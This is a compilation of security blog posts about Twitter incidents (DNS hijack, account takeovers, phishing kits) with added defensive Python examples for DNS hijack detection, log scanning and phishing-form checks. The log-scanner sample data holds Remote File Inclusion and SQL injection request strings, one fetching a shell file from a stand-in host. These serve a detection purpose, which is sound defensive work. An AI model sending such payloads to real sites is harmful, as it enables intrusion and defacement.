  • Check those short links: Network security firm Sucuri provides a free service that scans shortened URLs with McAfee SiteAdvisor and Google’s SafeBrowsing service. It’s available here: http://sucuri.net/index.php?page=tools&title=check-url. AVG’s LinkScanner is also an option that will scan all the links you visit in a supported browser.
  • Use Twitter security tools: Security tools designed specifically for Twitter are starting to appear on the market. I haven’t evaluated them yet, but one recent example is Krab Krawler from Kaspersky.

– on SafeCentral Blog

Posted in Antivirus

ClamAV twitter feed available

Notifications of ClamAV signature updates are now available via our Twitter feed at http://twitter.com/clamav. The notifications include information about the number of signatures added and the total number of signatures in the ClamAV database. We hope to include other information on that feed later, so please feel free to let us know suggestions, but remember that “twittiquette” means that we don’t wish to flood the feed with too much information.

– webmaster on Clam AntiVirus

Posted in Antivirus

Twitter Hack and the Iranian Cyber Army

(See continuing updates to this story below.)

Earlier this morning a DNS hack took control of Twitter.com traffic and redirected to a website with a splash page proclaiming, “THIS SITE HAS BEEN HACKED BY IRANIAN CYBER ARMY.” This hack has a lot in common with the Dr.Hiad website defacement I reported on two weeks ago.

New information
The so-called Iranian Cyber Army has defaced websites in the same manner as Dr.Hiad. At this moment (7:35AM Eastern Time) there is a website displaying the exact image that Twitter users saw earlier today during the Twitter hack event. A screenshot of that web page is shown below. The webpage contains an email link to the Iranian Cyber Army’s Gmail account.

It is likely that the Twitter DNS attackers simply pointed “twitter.com” to the IP address of a defaced website like the one below. It would not make sense for them to point Twitter traffic to their own web server: that would allow them to be traced and possibly caught.

When the Twitter attackers realized they could take over Twitter’s DNS, they had to decide where to point the traffic. Redirect it to comedycentral.com? Disney.com? Or how about a defaced webpage bearing the image of the Iranian Cyber Army?

There is some chance the Twitter attackers executed both the website defacement and the DNS takeover.

Screenshot of Iranian Cyber Army Website Defacement

DNS is Fundamental
DNS is the Internet service that kicks in when we type a website name into our browser or click a link on a web page. Type "twitter.com" into your browser and DNS will look up the IP address of the Twitter web server so your browser can connect and download all those tweets. As fundamental as DNS is to our Internet experience, it has virtually no built-in security: a resolver has no way to tell a genuine answer from a forged one unless the zone is signed with DNSSEC and the resolver validates it, and the resolvers on our home computers and Internet connections do neither. Just as important, the records that say where "twitter.com" lives are managed through accounts at the domain's registrar and DNS hosting provider, so whoever controls those accounts controls the name, and the authoritative DNS servers "up in the cloud" have had their own share of vulnerabilities. Either path lets attackers take over a name and carry out pranks like the Twitter redirection this morning.
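As an added illustration (not part of the original post), here is a small Python example that parses a DNS response in its RFC 1035 wire format and flags any answer address that is not on an operator-maintained allowlist. That comparison, run against your own name from several vantage points, is the check that notices a redirect like this one within minutes. The response bytes are constructed inline so the example runs offline, the addresses are RFC 5737 documentation ranges, and the allowlist values are assumptions for the example, not Twitter's real addresses.

```python
"""Parse a DNS answer (RFC 1035 wire format) and compare its A records
with an allowlist, to notice when a name has been pointed elsewhere.
Added example; the addresses below are RFC 5737 documentation ranges,
not the real addresses of any site."""
import struct
from ipaddress import ip_address


def encode_name(name: str) -> bytes:
    """Dotted name -> length-prefixed labels, terminated by a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(msg: bytes, offset: int):
    """Return (name, offset after the name). Follows compression pointers
    (two bytes whose top bits are 11) without letting them loop forever."""
    labels, end, hops = [], None, 0
    while True:
        length = msg[offset]
        if length & 0xC0 == 0xC0:  # pointer to an earlier copy of the name
            target = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            if end is None:
                end = offset + 2  # the pointer is the last thing in this name
            hops += 1
            if hops > 64:
                raise ValueError("compression pointer loop")
            offset = target
            continue
        offset += 1
        if length == 0:
            break
        labels.append(msg[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), (end if end is not None else offset)


def a_records(msg: bytes):
    """Return [(name, ttl, ipv4)] for every A record in the answer section."""
    qdcount, ancount = struct.unpack("!HH", msg[4:8])
    offset = 12  # fixed-size header
    for _ in range(qdcount):
        _, offset = decode_name(msg, offset)
        offset += 4  # QTYPE + QCLASS
    records = []
    for _ in range(ancount):
        name, offset = decode_name(msg, offset)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", msg[offset:offset + 10])
        offset += 10
        rdata = msg[offset:offset + rdlen]
        offset += rdlen
        if rtype == 1 and rclass == 1 and rdlen == 4:  # A record, class IN
            records.append((name, ttl, str(ip_address(rdata))))
    return records


def build_response(qname: str, answers) -> bytes:
    """Construct a minimal response (one question, N A records) so the
    example runs offline; a real check would send a query over UDP/53."""
    header = struct.pack("!HHHHHH", 0x1234, 0x8180, 1, len(answers), 0, 0)
    question = encode_name(qname) + struct.pack("!HH", 1, 1)
    body = b""
    for ttl, ip in answers:
        # 0xC00C: pointer to offset 12, i.e. the name in the question
        body += b"\xC0\x0C" + struct.pack("!HHIH", 1, 1, ttl, 4) + ip_address(ip).packed
    return header + question + body


def unexpected_addresses(msg: bytes, allowlist) -> list:
    """Answer addresses the operator did not publish. A non-empty result from
    a resolver that is normally right is the hijack signal."""
    return [ip for _, _, ip in a_records(msg) if ip not in allowlist]


if __name__ == "__main__":
    EXPECTED = {"192.0.2.10", "192.0.2.11"}  # assumption: our published addresses
    normal = build_response("twitter.com", [(300, "192.0.2.10"), (300, "192.0.2.11")])
    hijacked = build_response("twitter.com", [(60, "198.51.100.77")])
    print("normal:", unexpected_addresses(normal, EXPECTED))      # []
    print("hijacked:", unexpected_addresses(hijacked, EXPECTED))  # ['198.51.100.77']
```

In production the same comparison is worth running from resolvers in several networks, because a hijack at the registrar or DNS provider changes the answer everyone sees, whereas a poisoned cache at one ISP changes it for that ISP's customers only; the two cases call for different incident responses.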

Updates

December 18, 2009 8:20AM – Update
The defaced website that Twitter users were directed to, shown in the screenshot above, is an online forum for the Green Freedom Wave, an Iranian reform movement.

December 18, 2009 9:08AM – Update
The Green Freedom Wave website was hosted at Netfirms, a web hosting company of the kind that is well known to website defacers, who exploit weaknesses in the web applications and database servers such hosts run. These web hosting companies offer lots of functionality, including web sites, databases and online shops, at very reasonable prices. However, every one of those features is also attack surface, and a single exploitable script is enough to get a page replaced.

The website defacement is the minor part of this story. The DNS takeover is extremely serious, especially since it happened at Twitter.com, which receives over 20 million visitors per month. If Twitter.com had been redirected to a web page serving malware instead of a defacement banner, a huge chunk of the Internet population could have been infected. Perhaps I should say a "huger" chunk: one type of malware alone is already infecting 35 million computers per month.

December 18, 2009 10:35AM – Update
The Green Freedom Wave website was probably hacked using SQL Injection, Remote File Inclusion, or similar techniques that are well documented on the web. Note the signature line of Dr.Hiad from my earlier post. With Remote File Inclusion, a script on the target website that builds an include path from user input (a "page" or "template" parameter, say) is tricked into fetching and executing a file from an attacker-controlled server; once the attacker's code runs on the host, replacing the home page is a one-line file write.
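An added example, not from the original post: the techniques named above leave recognisable traces in a web server's access log, so here is a small Python scanner that runs over Apache combined-format lines and flags requests whose query parameters carry a remote URL or PHP stream wrapper (the Remote File Inclusion signature) or classic SQL injection tokens, including payloads hidden by double URL-encoding. The log lines are constructed for the example with RFC 5737 addresses, and the script names in them are assumptions, not details of the incident.

```python
"""Flag Remote File Inclusion and SQL injection probes in web server logs.
Added example with constructed log lines (RFC 5737 addresses); the
vulnerable script names are assumptions, not taken from the incident."""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Apache/nginx "combined" format: we only need client, request target and status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# A parameter value that is itself a URL or a PHP stream wrapper is the
# classic RFI payload: include($_GET['page']) fetches and executes it.
RFI_RE = re.compile(r"^\s*(https?|ftp)://|^\s*(php|data|expect|zip|phar)://", re.I)

# Tautologies, UNION-based extraction, comment terminators and timing probes
SQLI_RE = re.compile(
    r"'\s*(or|and)\s*['\d(]"              # ' OR 1=1 / ' OR 'a'='a
    r"|\bunion\b[\s\S]{0,40}\bselect\b"    # UNION [ALL] SELECT
    r"|(--|/\*|#)\s*$"                     # trailing comment swallowing the rest
    r"|\b(sleep|benchmark)\s*\(",          # time-based probes
    re.I,
)


def classify_target(target: str) -> list:
    """Return [(param, kind)] for suspicious query parameters in one request."""
    findings = []
    query = urlsplit(target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = unquote_plus(value)  # parse_qsl decoded once; this catches %2527-style double encoding
        if RFI_RE.search(value):
            findings.append((name, "rfi"))
        elif SQLI_RE.search(value):
            findings.append((name, "sqli"))
    return findings


def scan_log(lines) -> list:
    """Return one finding per suspicious parameter, with client and status.
    A 200 on an RFI probe deserves the most attention: the include worked."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line; a real tool would count these
        for param, kind in classify_target(m["target"]):
            hits.append({"ip": m["ip"], "kind": kind, "param": param,
                         "target": m["target"], "status": int(m["status"])})
    return hits


SAMPLE_LOG = [  # constructed for the example
    '203.0.113.5 - - [18/Dec/2009:06:10:01 +0000] "GET /index.php?page=http://198.51.100.9/shell.txt? HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [18/Dec/2009:06:10:03 +0000] "GET /forum/viewtopic.php?id=1%27%20OR%201%3D1-- HTTP/1.1" 500 312 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [18/Dec/2009:06:11:40 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [18/Dec/2009:06:12:09 +0000] "GET /index.php?page=php://input HTTP/1.1" 200 5100 "-" "curl/7.19.7"',
    '203.0.113.5 - - [18/Dec/2009:06:12:30 +0000] "GET /forum/viewtopic.php?id=%2527%2520UNION%2520SELECT%25201,2,3 HTTP/1.1" 200 4099 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['kind']:5} {hit['ip']:15} {hit['param']}= {hit['target']} -> {hit['status']}")
```

The patterns are deliberately narrow so that a hit is worth a human look; the fix on the application side is the same for every finding of the first kind, namely never passing user input to include() or to a file fetch, but mapping a parameter onto a fixed allowlist of local templates.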

December 19, 2009 7:49AM – Update
Busy day yesterday speaking to reporters and colleagues about the Twitter DNS compromise. Here are a couple of stories:

– on SafeCentral Blog

Posted in Antivirus


Kirstie Allsopp’s Twitter account compromised, attacks Sir Alan Sugar

There were some very peculiar goings-on in Twitterland today, as the account of Kirstie Allsopp seemed to be taking potshots at Sir Alan Sugar:

whoops

The only problem? She didn’t post that message, despite a bit of confusion and the fact that the pair of them had a very public argument recently.

not me

It seems like it might be an easy thing to work out: so far, the compromiser is apparently making all of their posts from an iPhone.

not again

Not so long ago, her account was hijacked and started sending out iPad spam. Methinks this time around she’ll be lucky not to get a “You’re fired” from Sir Alan…

Christopher Boyd

View full post on Sunbelt Blog

Posted in Antivirus

Twitter phish + 123Greetings phish = malware

Spammers are taking you on a jolly ride starting with a Twitter phishing scam which, if you follow it, gets you onto a 123Greetings lookalike site. When I see various drugs advertised on that same page, I think: "Canadian pharmacy!" Trying to play the e-card or clicking on anything on that page for [...]

View full post on Malware Diaries

Posted in Security

Facebook and Twitter Flunk Security Report Card

Ignorance is bliss, so don’t read any further if you don’t want to panic about Facebook and Twitter security.

View full post on Computerworld Security News

Posted in Security

Jurors banned from using Twitter on Oracle-SAP trial

Jury selection for Oracle’s corporate theft lawsuit against SAP got under way Monday in a California courtroom, where potential jurors were warned they would have to refrain from posting on Facebook or Twitter about the case if they are selected to take part in the trial.

View full post on Computerworld Security News

Posted in Security

Mistype Twitter or Facebook, win an iPad (or not)

A slip on the keyboard could land Web surfers on questionable survey pages instead of the websites they really want to visit: Twitter, Facebook or YouTube.

View full post on Network World on Security

Posted in Security

Koobface worm targets Mac users on Facebook, Twitter

A new variant of the Koobface worm that targets Mac OS X and Linux as well as Windows is spreading through Facebook, MySpace and Twitter, security researchers warned today.

View full post on Network World on Security

Posted in Security

New Firefox add-on hijacks Facebook, Twitter sessions

A new Firefox add-on dubbed Firesheep lets ‘pretty much anyone’ scan a Wi-Fi network and hijack others’ access to Facebook, Twitter and a host of other services, a security researcher warned today.

View full post on Computerworld Security News

Posted in Security

Firesheep Firefox Add-On Hijacks Twitter, Facebook Over Wi-Fi

A new Firefox add-on named Firesheep lets users take over sessions on Facebook, Twitter, Google, and more from open Wi-Fi networks.

View full post on PCMag.com Security Coverage

Posted in Security


Twitter phish aims for the big players

Over the weekend we saw a link being pinged around in various chatrooms, which was directing users to a “mobile” version of Twitter. The page was a phish located on a free webhost:

fake mobile twitter page

What particularly caught my eye was when I dug around on Twitter itself for the URL. Check out these posts from 2009:

phishing for logins

We have a Twitter account with “Facebook” in the name (a dirty big clue that something isn’t right here), sending out links to a “lighter version of Facebook”…which takes you to the fake Twitter page.

I’m sure it made sense to the creator at the time, but anyway. This was a clear attempt to grab some high profile accounts and use them for shenanigans:

Sapp

Warren Sapp, retired American Football player.

Sudol

Alison Sudol, singer / songwriter with a rather large follow count.

Wentz

Pete Wentz from the band Fall Out Boy, with an even bigger collection of followers.

It doesn’t look like any of them ever sent out spam, infection or phish links, so hopefully they didn’t take the bait – there could have been a bit of a Fall Out (oh ho ho) from that eventuality. The phish URL had quite a bit of action going on:

fake logins galore

Fake Facebook and Twitter pages, along with a stolen password page for each. Luckily neither password dump appeared to have any valid accounts in them – everything we saw was either random garbage or humorous and entertaining messages left for the phisher, usually with a record number of swearwords thrown in for good measure.

Of course, we’ve reported all of the above and while the rogue Twitter account is still live (though probably not for long), the URL it happens to be pointing to looks like this:

404


“The site in question was violating our ToS and was removed”.

No kidding.

Christopher Boyd

View full post on Sunbelt Blog

Posted in Antivirus


Fake Twitter homepage kit serves up naked ladies and infection files

You might be wondering why the frontpage of Twitter has a big “Edit” line running through it in the screenshot below:

fake twitter

The answer, of course, is that this is not the real Twitter page at all. It’s part of an increasingly popular kit used for shenanigans:

twitter download

The scammer downloads the zip, edits the links in the .htm file and places something likely to catch the attention of an end-user underneath the “Edit” line. The fact that the fake content is sitting directly underneath the “New Twitter” promotional text is not a coincidence.

Fake content ahoy

“Hey look, semi-naked ladies are part of the new Twitter experience! Yay! Oh wait, I have to run some sort of Sun Java update…and now my computer is sending Viagra spam to my mother.”

Top tip: if you happen to see semi-naked ladies posing under the yellow “Sign up” button on the Twitter homepage, you’re on a scam site. If the Twitter homepage starts popping boxes asking you to install Java security updates, or grab Adobe Flash executables, or files with “pwned” in the title – you’re on a scam site.

The “new Twitter experience” may be full of shiny, blinky things but infection files aren’t supposed to be part of the deal. On the bright side, all the fake pages we’ve seen so far make no attempt to disguise the fact they’re sitting on free hosting services. This obviously means they don’t look a bit like the genuine Twitter.com URL. I’m sure it won’t stay like that forever though, so be wary of potential typosquatting, because this technique combined with an “almost but not quite” domain name could reel in quite a few victims…

Christopher Boyd

View full post on Sunbelt Blog

Posted in Antivirus

JustSpotted Celeb Stalking Site Loses Twitter Firehose Access

Twitter has pulled the plug on its involvement in a Web site intended to track the whereabouts of celebrities. JustSpotted.com misrepresented itself, so its license to access the micro-blogging site’s “firehose” of data was revoked, Twitter said Friday.

View full post on PCMag.com Security Coverage

Posted in Security

Twitter password phishing

Our man in the UK, Chris Boyd, got this via a contact. It was from a Twitterer who obviously had his Twitter login stolen:

 

(Twitter apparently is filtering this URL at this point.)

The link led to a phishing page that used the deceptive tactic of showing an error message: “Wrong Username/Email and password combination.” You log in, it steals your Twitter password, sends the above tweet to all your contacts and continues rounding up passwords.

 

If you’re “ill-informed” enough to log in to the phishing page, it snatches whatever username and password you’ve entered and passes you along to the Twitter log-in page. We made up a username and password and it took them. The real Twitter log-in page would have given you an error notification.

There are two pieces of evidence here that you’ve been phished: Firefox asks if you want it to remember the password which you just gave to my3gb.com – obviously the phishing site (up since July 12). And there’s the Twitter “sign in” button on the page. That wouldn’t be there if you had really logged in.

 

This is phishing. The safe practice in this situation is: don’t log into pages that you get as links in emails. Go to the site yourself: type in the URL or use your bookmark.

Thanks “Just_this_time”

Tom Kelchner

View full post on Sunbelt Blog
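The tells described in this post (the browser offering to save a Twitter password for my3gb.com, credentials accepted regardless of what was typed) and the typosquatting warning in the fake-homepage-kit post above come down to one question: which host actually receives the password? The following Python check answers it for a login form, and is an added example rather than code from either post. TRUSTED, the sample URLs (RFC 2606 example domains and RFC 5737 addresses) and the two-label domain shortcut are assumptions made for the example.

```python
"""Decide whether a login form would send a password to the site it claims
to be. Added example; TRUSTED, the sample URLs (RFC 2606 example domains)
and the two-label domain shortcut are assumptions made for the example."""
import ipaddress
from urllib.parse import urljoin, urlsplit

TRUSTED = {"twitter.com"}  # assumption: the only domain that should see this password


def registrable_domain(host: str) -> str:
    """Last two labels. Real code should consult the Public Suffix List so
    that 'example.co.uk' style names are handled (simplification)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to spot typosquats such as twiter.com."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def check_login_form(page_url: str, form_action: str = "", trusted=TRUSTED):
    """Return (verdict, reasons). 'ok' only when the host receiving the
    credentials is a trusted domain over HTTPS; otherwise 'suspicious'."""
    dest = urlsplit(urljoin(page_url, form_action))  # relative action -> page's own host
    host = (dest.hostname or "").lower()
    reasons = []
    if dest.scheme != "https":
        reasons.append("password would be sent without TLS")
    try:
        ipaddress.ip_address(host)
        reasons.append("destination is a bare IP address")
        return "suspicious", reasons
    except ValueError:
        pass  # not an IP literal, carry on with the domain checks
    domain = registrable_domain(host)
    if domain in trusted:
        return ("ok" if not reasons else "suspicious"), reasons
    reasons.append(f"credentials go to {domain}, not a trusted domain")
    where = host + urlsplit(page_url).path.lower()
    for t in trusted:
        brand = t.split(".")[0]
        if brand in where:  # 'twitter' in a subdomain or path of some free host
            reasons.append(f"brand name '{brand}' used outside its own domain (lookalike)")
        elif edit_distance(domain, t) <= 2:
            reasons.append(f"{domain} is within two edits of {t} (typosquat)")
    return "suspicious", reasons


if __name__ == "__main__":
    for page, action in [
        ("https://twitter.com/login", "/sessions"),
        ("http://twitter-mobile.example.net/login.htm", "login.php"),
        ("https://twiter.com/login", "/sessions"),
        ("http://198.51.100.7/twitter/", "index.php"),
    ]:
        verdict, why = check_login_form(page, action)
        print(verdict, page, why)
```

The browser's password-manager prompt in the post is the same check performed by the user: the prompt names the registrable domain the password is about to be stored for, and if that name is not the site you meant to log in to, the form has already posted your credentials to someone else.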

Posted in Antivirus

Twitter Followers at Zero, Direct Messages Disabled

In the wake of the new Twitter.com roll-out, the micro-blogging site on Monday was experiencing intermittent issues that affected follower counts as well as the ability to follow other users and send direct messages.

View full post on PCMag.com Security Coverage

Posted in Security
